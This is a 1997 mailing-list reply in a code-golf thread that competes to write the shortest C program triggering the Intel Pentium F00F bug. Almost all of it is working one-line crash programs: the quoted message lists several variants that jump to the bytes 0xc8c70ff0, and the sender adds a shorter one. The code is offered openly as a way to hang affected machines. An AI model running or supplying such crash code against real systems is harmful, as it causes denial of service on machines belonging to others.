From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 15 Nov 1997 13:05:34 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: smaller f00f.c
In-Reply-To: <199711141623.QAA03067@server.test.net>
Message-ID: <199711150429.WAA19784@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



int main=0xc8c70ff0;


igor

Adam Back wrote:
> 
> 
> 
> f00fie writes:
> > In the grand tradition of RSA-in-3-lines-of-perl, we present
> > Crash-A-Pentium-in-44-characters:
> > 
> >    main(){int i=0xc8c70ff0;void (*f)()=&i;f();}
> 
> Hey, challenge is on:
> 
> main(){int i=0xc8c70ff0;void (*f)()=&i;f();} /* f00fies 44 char */
> main(){((int(*)())"\360\017\307\310")();}
> main(){int i=0xc8c70ff0,(*f)()=&i;f();}
> main(i){int(*f)()=&i;i=0xc8c70ff0;f();}
> main(i){i=0xc8c70ff0;((int(*)())&i)();}
> (*f)();main(i){f=&i;i=0xc8c70ff0;f();}
> (*f)()="\360\017\307\310";main(){f();}       /* 38 chars */
> 
> Compiled with gcc.
> 
> (Note that I haven't tested them because I have an AMD k5 which
> doesn't suffer from this bug -- perhaps someone with an Intel pentium
> could try them).
> 
> Adam
> 



	- Igor.





